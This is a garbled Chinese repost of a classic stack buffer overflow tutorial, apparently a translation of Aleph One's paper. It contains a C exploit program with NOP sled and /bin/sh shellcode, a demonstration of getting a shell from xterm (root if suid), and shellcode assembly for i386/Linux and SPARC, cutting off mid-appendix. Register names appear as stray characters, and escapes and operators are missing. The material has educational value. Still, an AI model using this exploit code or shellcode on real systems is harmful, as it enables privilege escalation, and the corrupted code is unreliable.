早期的电脑入侵者

栈顶　　　89ABCDEF0123456789AB　CDEF　0123　4567　89AB　CDEF　栈底

　　　　　buffer　　　　　　　　ebp　　ret　　a　　b　　　c

　<------[NNNNNNNNNNNSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]

　　　　　　　　^　　　　　　　　　　　|

　　　　　　　　|＿＿＿＿＿＿＿＿＿＿＿|

现在我们就能够根据这个方法编写我们的攻击程式了.

exploit2.c

------------------------------------------------------------------------------

#include <stdlib.h>

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 512

#define NOP 0x90

char shellcode[] =

"xebx18x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"

"x89xf3x8dx4ex08x8dx56x0cxcdx80xe8xecxffxffxff/bin/sh";

unsigned long get_sp(void)

{

__asm__("movl %esp,陎");

}

void main(int argc, char *argv[])

{

char *buff, *ptr;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

int i;

if (argc > 1) bsize = atoi(argv[1]);

if (argc > 2) offset= atoi(argv[2]);

if (!(buff = malloc(bsize)))

{

printf("Can't allocate memory. ");

exit(0);

}

addr=get_sp()-offset;

printf("Using address: 0x%x ", addr);

ptr=buff;

addr_ptr=(long *)ptr;

for(i=0;i<bsize;i =4) *(addr_ptr )=addr; // 填充猜测的入口地址

for(i=0;i<bsize/2;i ) buff[i]=NOP; //前半部填充NOP

ptr = buff ((bsize/2) - (strlen(shellcode)/2));

for (i=0;i<strlen(shellcode);i ) *(ptr )=shellcode[i]; //中间填充Shell Code

buff[bsize-1]='';

memcpy(buff,"EGG=",4); //将生成的字符串保存再环境变量EGG中.

putenv(buff);

system("/bin/bash");

}

------------------------------------------------------------------------------

好,现在我们来试验一下这个程式的效能如何.这次的攻击目标是xterm(任何链接了Xt Library的程式都有此缺陷). 首先确保X Server在运行并且允许本地连接.

------------------------------------------------------------------------------

[aleph1] $ export DISPLAY=:0.0

[aleph1] $ ./exploit2 1124

Using address: 0xbffffdb4

[aleph1] $ /usr/X11R6/bin/xterm -fg  $EGG

Warning: some arguments in previous message were lost

bash $

------------------------------------------------------------------------------

OK! 看来我们的程式确实很好用.假如xterm有suid-root属性,那么这个shell就是个具备root权限的Shell了.

--------------------------------------------------------------------------------

Appendix A - 若干操作系统/平台上的 Shell Code

i386/Linux

------------------------------------------------------------------------------

jmp 0x1f

popl %esi

movl %esi,0x8(%esi)

xorl 陎,陎

movb 陎,0x7(%esi)

movl 陎,0xc(%esi)

movb  $0xb,%al

movl %esi,離

leal 0x8(%esi),靫

leal 0xc(%esi),韝

int  $0x80

xorl 離,離

movl 離,陎

inc 陎

int  $0x80

call -0x24

.string "/bin/sh"

------------------------------------------------------------------------------

SPARC/Solaris

------------------------------------------------------------------------------

sethi 0xbd89a, %l6

or %l6, 0x16e, %l6

sethi 0xbdcda, %l7

and %sp, %sp, %o0

add %sp, 8, %o1

xor %o2, %o2, %o2

add %sp, 16, %sp

std %l6, [%sp - 16]

st %sp, [%sp - 8]

st %g0, [%sp - 4]

mov 0x3b, %g1

ta 8

xor %o7, %o7, %o0

mov 1, %g1

ta 8

------------------------------------------------------------------------------

SPARC/SunOS

------------------------------------------------------------------------------

sethi 0xbd89a, %l6

or %l6, 0x16e, %l6

sethi 0xbdcda, %l7

and %sp, %sp, %o0

add %sp, 8, %o1

xor %o2, %o2, %o2

add %sp, 16, %sp

std %l6, [%sp - 16]

st %sp, [%sp - 8]

st %g0, [%sp - 4]

mov 0x3b, %g1

mov -0x1, %l5

ta %l5 1

xor %o7, %o7, %o0

mov 1, %g1

ta %l5 1

--------------------------------------------------------------------------------

Appendix B - 通用 Buffer Overflow 攻击程式

shellcode.h

------------------------------------------------------------------------------

#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE 1

char nop[] = "x90";

char shellcode[] =

"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"

"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!